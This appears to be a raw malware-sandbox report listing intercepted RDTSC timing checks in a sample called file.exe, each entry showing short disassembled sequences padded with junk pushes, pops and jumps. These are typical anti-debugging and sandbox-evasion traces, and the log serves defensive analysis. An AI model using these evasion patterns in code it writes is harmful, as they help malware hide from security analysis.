Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F488AA second address: F488B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F488B0 second address: F488B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F488B4 second address: F488BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F48A30 second address: F48A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F48A38 second address: F48A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d pop ebx 0x0000000e push edi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F48D0A second address: F48D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8C7D0F0866h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F48D16 second address: F48D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F48E4E second address: F48E66 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8C7D0F0866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8C7D0F086Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F48E66 second address: F48E6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F48E6A second address: F48E6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F48E6E second address: F48E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 je 00007F8C7D0F21D2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F48FCF second address: F48FD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F48FD7 second address: F48FF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8C7D0F21CEh 0x0000000c jmp 00007F8C7D0F21CDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F48FF9 second address: F48FFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F50DE2 second address: F50DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4EE32 second address: F4EE36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4EE36 second address: F4EE42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4EE42 second address: F4EE46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4EFA0 second address: F4EFA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4F39B second address: F4F39F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4FF63 second address: F4FF85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8C7D0F21C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8C7D0F21D3h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4FF85 second address: F4FF89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4FF89 second address: F4FF95 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8C7D0F21C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4FF95 second address: F4FFB4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F8C7D0F0877h 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F50238 second address: F5023C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5023C second address: F50257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C7D0F0871h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F50257 second address: F5025D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F50A91 second address: F50AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8C7D0F0866h 0x0000000a pushad 0x0000000b jnp 00007F8C7D0F0866h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5639A second address: F563AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C7D0F21D1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F563AF second address: F563BD instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8C7D0F0866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5989F second address: F598A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F598A3 second address: F598E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F086Fh 0x00000007 jc 00007F8C7D0F0866h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop ebx 0x00000013 popad 0x00000014 pushad 0x00000015 jno 00007F8C7D0F087Ch 0x0000001b jng 00007F8C7D0F0868h 0x00000021 pushad 0x00000022 popad 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F59FBD second address: F59FD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C7D0F21D3h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F59FD7 second address: F59FDC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F638CC second address: F63914 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8C7D0F21D9h 0x00000008 jmp 00007F8C7D0F21CDh 0x0000000d jmp 00007F8C7D0F21D4h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007F8C7D0F21C6h 0x0000001b push eax 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F63914 second address: F63918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F63918 second address: F63926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F63926 second address: F6392C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6392C second address: F63935 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F63935 second address: F6393A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6393A second address: F6393F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6393F second address: F6394F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jnp 00007F8C7D0F0866h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F621B1 second address: F621C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F8C7D0F21C6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6273D second address: F62744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F62744 second address: F62750 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F8C7D0F21C6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F62750 second address: F62754 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F62754 second address: F62765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8C7D0F21C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F695C7 second address: F695D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F695D9 second address: F695EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8C7D0F21CCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F695EB second address: F695F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F8C7D0F0866h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F692EE second address: F692FC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F8C7D0F21C6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F692FC second address: F69339 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8C7D0F0866h 0x00000008 jmp 00007F8C7D0F086Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jo 00007F8C7D0F0877h 0x00000015 jmp 00007F8C7D0F086Fh 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F8C7D0F086Eh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F782A2 second address: F782A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7FCC7 second address: F7FCCC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7FCCC second address: F7FCF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8C7D0F21C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8C7D0F21D9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7FCF2 second address: F7FD05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F086Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F887CD second address: F887E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F21D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F88656 second address: F8865E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8A6D8 second address: F8A6EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C7D0F21D1h 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8A6EE second address: F8A6F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8A6F4 second address: F8A709 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b je 00007F8C7D0F21CEh 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F92C01 second address: F92C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8C7D0F0878h 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e pushad 0x0000000f jmp 00007F8C7D0F0875h 0x00000014 js 00007F8C7D0F0866h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F92C3F second address: F92C54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F8C7D0F21C6h 0x00000009 jne 00007F8C7D0F21C6h 0x0000000f popad 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F930BD second address: F930CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8C7D0F0866h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9946E second address: F99487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C7D0F21D5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F99487 second address: F9948B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9948B second address: F994C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 je 00007F8C7D0F21C6h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop ecx 0x00000010 popad 0x00000011 pushad 0x00000012 push edi 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop edi 0x00000016 ja 00007F8C7D0F21C8h 0x0000001c push eax 0x0000001d push edx 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 jmp 00007F8C7D0F21D3h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F98FA6 second address: F98FBA instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8C7D0F086Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F990F5 second address: F9911C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C7D0F21D4h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F8C7D0F21C6h 0x00000012 ja 00007F8C7D0F21C6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9911C second address: F99120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F99120 second address: F99133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F8C7D0F21C6h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F99133 second address: F99147 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8C7D0F0866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA53EB second address: FA5402 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8C7D0F21CDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA5251 second address: FA526A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C7D0F0874h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA526A second address: FA5270 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA5270 second address: FA527A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA527A second address: FA5284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8C7D0F21C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB52EE second address: FB52F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB80C9 second address: FB80E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnl 00007F8C7D0F21CCh 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB80E0 second address: FB80E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB80E6 second address: FB8115 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F21D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F8C7D0F21D5h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB8115 second address: FB811D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB811D second address: FB813D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F8C7D0F21C6h 0x0000000a popad 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007F8C7D0F21D0h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB98B8 second address: FB98CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F0871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB98CD second address: FB9909 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F21CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F8C7D0F21D2h 0x00000011 jmp 00007F8C7D0F21D6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB9909 second address: FB9911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB9911 second address: FB9915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF3A4 second address: FCF3A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF3A8 second address: FCF3AE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF3AE second address: FCF3CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8C7D0F0875h 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF3CD second address: FCF3E7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8C7D0F21C6h 0x00000008 jc 00007F8C7D0F21C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 jnp 00007F8C7D0F21C6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCE45F second address: FCE465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCE465 second address: FCE487 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8C7D0F21C6h 0x00000008 jmp 00007F8C7D0F21D8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCE487 second address: FCE48C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCE48C second address: FCE4AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C7D0F21D1h 0x00000009 jbe 00007F8C7D0F21C6h 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCE4AD second address: FCE4DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F8C7D0F086Ch 0x0000000f jg 00007F8C7D0F0866h 0x00000015 pushad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 jmp 00007F8C7D0F0877h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCE4DE second address: FCE4E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
